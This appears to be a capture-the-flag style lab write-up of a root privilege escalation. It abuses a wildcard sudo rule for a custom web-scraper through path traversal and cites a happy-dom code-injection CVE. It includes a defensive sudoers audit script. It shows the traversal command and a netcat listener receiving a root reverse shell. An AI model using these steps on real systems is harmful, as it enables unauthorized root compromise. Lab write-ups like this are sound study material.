CVE-2024-51757


The wp_hub user has sudo privileges to run /usr/bin/web-scraper /root/web_src_downloaded/*.html as root without being prompted for a password. The rule is vulnerable to wildcard injection because of the wildcard (*) in its argument pattern. Additionally, /usr/bin/web-scraper is a custom Node.js application that uses an outdated and vulnerable version of the happy-dom module, which is prone to code injection: CVE-2024-51757.

A vulnerability was found in capricorn86 happy-dom up to 15.10.1. It has been classified as critical. Affected is some unknown functionality. The manipulation with an unknown input leads to a code injection vulnerability. CWE is classifying the issue as CWE-94. The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment. This is going to have an impact on confidentiality, integrity, and availability.

Exploit


PoC is available

Exploitation


Besides the CVE-2024-51757 vulnerability, the core issue lies in the use of a wildcard (*) in the sudo privilege command:

wp_hub@wallpaperhub:~$ sudo -u root /usr/bin/web-scraper /root/web_src_downloaded/../../tmp/pe.html

The pattern is easily bypassed with path traversal, so the malicious HTML file is accepted: ../../tmp/pe.html
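The bypass works because sudo compares the argument against the sudoers pattern with fnmatch(3) and no FNM_PATHNAME flag, so * also matches the / and .. components of a traversal path. The following script is an added example, not part of the original writeup: it reproduces that match on a constructed sudoers line (the "ALL=(root) NOPASSWD:" part is assumed; the page quotes only the command and pattern) and implements the containment check a validating wrapper would need before the wildcard rule is replaced with one that grants the wrapper alone.

```python
import posixpath
import re
from fnmatch import fnmatchcase

# Constructed sudoers line modelled on the rule in the writeup; the page only
# quotes the command and pattern, so "ALL=(root) NOPASSWD:" is an assumption.
SUDOERS_RULE = ("wp_hub ALL=(root) NOPASSWD: "
                "/usr/bin/web-scraper /root/web_src_downloaded/*.html")

RULE_RE = re.compile(
    r"^(\S+)\s+\S+=\([^)]*\)\s*(?:(?:NOPASSWD|PASSWD|NOEXEC|SETENV):\s*)*"
    r"(\S+)\s*(.*)$")

def parse_rule(rule):
    """Return (user, command, argument pattern) for a one-line sudoers entry."""
    m = RULE_RE.match(rule.strip())
    if not m:
        raise ValueError("unsupported sudoers syntax: " + rule)
    return m.group(1), m.group(2), m.group(3)

def rule_matches(argpat, arg):
    """sudo compares the argument with fnmatch(3) without FNM_PATHNAME, so
    '*' also matches '/' and '..'; fnmatchcase() behaves the same way."""
    return fnmatchcase(arg, argpat)

def escapes_directory(argpat, arg):
    """True when the argument normalises outside the directory the pattern
    was meant to restrict it to (a real wrapper should realpath() it too)."""
    allowed_dir = posixpath.dirname(argpat).rstrip("/") + "/"
    return not posixpath.normpath(arg).startswith(allowed_dir)

def audit_rule(rule, candidate_args):
    """Flag wildcard patterns and accepted arguments that leave the directory."""
    user, cmd, argpat = parse_rule(rule)
    findings = []
    if "*" in argpat or "?" in argpat:
        findings.append(f"{user}: wildcard in argument pattern for {cmd}")
    for arg in candidate_args:
        if rule_matches(argpat, arg) and escapes_directory(argpat, arg):
            findings.append(f"{user}: {arg!r} matches {argpat!r} but resolves "
                            f"to {posixpath.normpath(arg)}")
    return findings

if __name__ == "__main__":
    for line in audit_rule(SUDOERS_RULE, [
            "/root/web_src_downloaded/index.html",
            "/root/web_src_downloaded/../../tmp/pe.html"]):
        print(line)
```

The same two checks, a wildcard in the argument pattern and an accepted argument that normalises elsewhere, are what to look for when reviewing sudoers files for this class of bypass.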

The execution flow was captured with pspy, and the payload was called:

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/wallpaperhub]
└─$ nnc 5000
listening on [any] 5000 ...
connect to [192.168.45.217] from (UNKNOWN) [192.168.106.204] 52210
root@wallpaperhub:~# whoami
root
root@wallpaperhub:~# hostname
wallpaperhub
root@wallpaperhub:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
3: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:50:56:9e:2f:55 brd ff:ff:ff:ff:ff:ff
    altname enp11s0
    inet 192.168.106.204/24 brd 192.168.106.255 scope global ens192
       valid_lft forever preferred_lft forever

System-level compromise